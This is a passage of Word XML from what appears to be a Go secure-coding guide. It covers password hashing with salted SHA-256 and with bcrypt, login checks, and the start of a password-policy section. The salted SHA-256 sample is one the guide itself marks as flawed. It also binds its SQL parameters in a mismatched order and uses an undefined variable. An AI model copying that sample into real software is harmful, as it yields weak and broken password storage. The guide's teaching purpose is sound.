      <w:bookmarkStart w:id="30" w:name="1__How_to_Turn_Off_Form_Autocompletion__Mozilla_D___"/>
      <w:pPr>
        <w:pStyle w:val="Para 22"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text5"/>
        </w:rPr>
        <w:t/>
        <w:t>1</w:t>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:hyperlink r:id="rId67" w:tooltip="">
        <w:r>
          <w:t>How to Turn Off Form Autocompletion</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text5"/>
        </w:rPr>
        <w:t>, Mozilla Developer Network</w:t>
      </w:r>
      <w:hyperlink w:anchor="1" w:tooltip="Jump back to footnote [1] in the text.">
        <w:r>
          <w:t xml:space="preserve"> ↩</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="31" w:name="2__Log_Files__Apache_Documentation__"/>
      <w:pPr>
        <w:pStyle w:val="Para 19"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
        <w:t>2</w:t>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:hyperlink r:id="rId68" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Log Files</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>, Apache Documentation</w:t>
      </w:r>
      <w:hyperlink w:anchor="2" w:tooltip="Jump back to footnote [2] in the text.">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t xml:space="preserve"> ↩</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="32" w:name="3__log_format__Nginx_log_module__log_format__dire___"/>
      <w:pPr>
        <w:pStyle w:val="Para 18"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
        <w:t>3</w:t>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:hyperlink r:id="rId69" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>log_format</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>, Nginx log_module "log_format" directive</w:t>
      </w:r>
      <w:hyperlink w:anchor="3" w:tooltip="Jump back to footnote [3] in the text.">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t xml:space="preserve"> ↩</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="33" w:name="Validation_and_storing_authentication_data"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>Validation and storing authentication data</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="34" w:name="Validation"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
      </w:pPr>
      <w:r>
        <w:t>Validation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>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it clear that "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>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35" w:name="Storing_password_securely__the_theory"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>Storing password securely: the theory</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>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2"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, so that for every password </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>p1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>p2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>p1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is different from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>p2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>H(p1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is also different from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>H(p2)</w:t>
      </w:r>
      <w:hyperlink w:anchor="1__Hashing_functions_are_the_subject_of_Collision___" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:bookmarkStart w:id="36" w:name="1"/>
          <w:t>1</w:t>
          <w:bookmarkEnd w:id="36"/>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Does this sound, or look like math? Pay attention to this last requirement: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> should be such a function that there's no function </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>H⁻¹</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> so that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>H⁻¹(H(p1))</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is equal to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>p1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. This means that there's no way back to the original </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>p1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, unless you try all possible values of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>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2"/>
        </w:rPr>
        <w:t>p1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, we should store a different hashed value. It may sound impossible, but the answer is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>salt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: a pseudo-random </w:t>
        <w:t>unique per user password</w:t>
        <w:t xml:space="preserve"> value which is appended to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>p1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, so that the resulting hash is computed as follows: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>H(p1 + salt)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">So each entry on a passwords store should keep the resulting hash, and the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>salt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> itself in plaintext: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>salt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is not required to remain private.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Last recommendations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Avoid using deprecated hashing algorithms (e.g. SHA-1, MD5, etc)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:pStyle w:val="Para 13"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve">Read the </w:t>
      </w:r>
      <w:hyperlink w:anchor="Top_of_pseudo_random_generators_html" w:tooltip="">
        <w:r>
          <w:t>Pseudo-Random Generators section</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>The following code-sample shows a basic example of how this works:</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"crypto/rand"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"crypto/sha256"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"database/sql"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"context"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"fmt"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
)
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> saltSize = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> main() {
    ctx := context.Background()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create random word</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    salt := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">make</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">([]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, saltSize)
    _, err := rand.Read(salt)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t xml:space="preserve">// let's create SHA256(password+salt)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    hash := sha256.New()
    hash.Write(password)
    hash.Write(salt)
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// this is here just for demo purposes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// fmt.Printf("email   : %s\n", string(email))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// fmt.Printf("password: %s\n", string(password))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// fmt.Printf("salt    : %x\n", salt)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// fmt.Printf("hash    : %x\n", hash.Sum(nil))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// you're supposed to have a database connection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    stmt, err := db.PrepareContext(ctx, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"INSERT INTO accounts SET hash=?, salt=?, email=?"</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result, err := stmt.ExecContext(ctx, email, h, salt)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
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>However, this approach has several flaws and should not be used. It is shown here only to illustrate the theory with a practical example. The next section explains how to correctly salt passwords in real life.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="37" w:name="Storing_password_securely__the_practice"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>Storing password securely: the practice</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>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tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>OWASP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> are </w:t>
      </w:r>
      <w:hyperlink r:id="rId70" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text6"/>
          </w:rPr>
          <w:t>bcrypt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId71" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text6"/>
          </w:rPr>
          <w:t>PDKDF2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId72" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text6"/>
          </w:rPr>
          <w:t>Argon2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId73" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text6"/>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2"/>
        </w:rPr>
        <w:t>go get</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">go get golang.org/x/crypto
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>The following example shows how to use bcrypt, which should be good enough for most of the situations. The advantage of bcrypt is that it is simpler to use, and is therefore less error-prone.</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"database/sql"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"context"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"fmt"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"golang.org/x/crypto/bcrypt"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
)
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> main() {
    ctx := context.Background()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Hash the password with bcrypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    hashedPassword, err := bcrypt.GenerateFromPassword(password, bcrypt.DefaultCost)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t xml:space="preserve">// this is here just for demo purposes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// fmt.Printf("email          : %s\n", string(email))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// fmt.Printf("password       : %s\n", string(password))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// fmt.Printf("hashed password: %x\n", hashedPassword)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// you're supposed to have a database connection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    stmt, err := db.PrepareContext(ctx, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"INSERT INTO accounts SET hash=?, email=?"</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result, err := stmt.ExecContext(ctx, hashedPassword, email)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
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Bcrypt also provides a simple and secure way to compare a plaintext password with an already hashed password:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 05"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text10"/>
        </w:rPr>
        <w:t xml:space="preserve"> ctx := context.Background()
 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// credentials to validate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
 email := []</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"john.doe@somedomain.com"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
 password := []</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"47;u5:B(95m72;Xq"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// fetch the hashed password corresponding to the provided email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
record := db.QueryRowContext(ctx, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"SELECT hash FROM accounts WHERE email = ? LIMIT 1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, email)
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> expectedPassword </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> err := record.Scan(&amp;expectedPassword); err != </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> {
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// user does not exist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// this should be logged (see Error Handling and Logging) but execution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// should continue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
}
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> bcrypt.CompareHashAndPassword(password, []</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">(expectedPassword)) != </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> {
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// passwords do not match</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// passwords mismatch should be logged (see Error Handling and Logging)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// error should be returned so that a GENERIC message "Sign-in attempt has</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// failed, please check your credentials" can be shown to the user.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
}
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="38" w:name="1__Hashing_functions_are_the_subject_of_Collision___"/>
      <w:pPr>
        <w:pStyle w:val="Para 18"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
        <w:t>1</w:t>
        <w:t>. Hashing functions are the subject of Collisions but recommended hashing functions have a really low collisions probability</w:t>
      </w:r>
      <w:hyperlink w:anchor="1" w:tooltip="Jump back to footnote [1] in the text.">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t xml:space="preserve"> ↩</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="39" w:name="Password_Policies"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>Password Policies</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>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1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>If your application sign-in requires a password, the best you can do is to "</w:t>
      </w:r>
      <w:r>
        <w:t>enforce password complexity requirements, (...) requiring the use of alphabetic as well as numeric and/or special characters)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>". Password length should also be enforced: "</w:t>
      </w:r>
      <w:r>
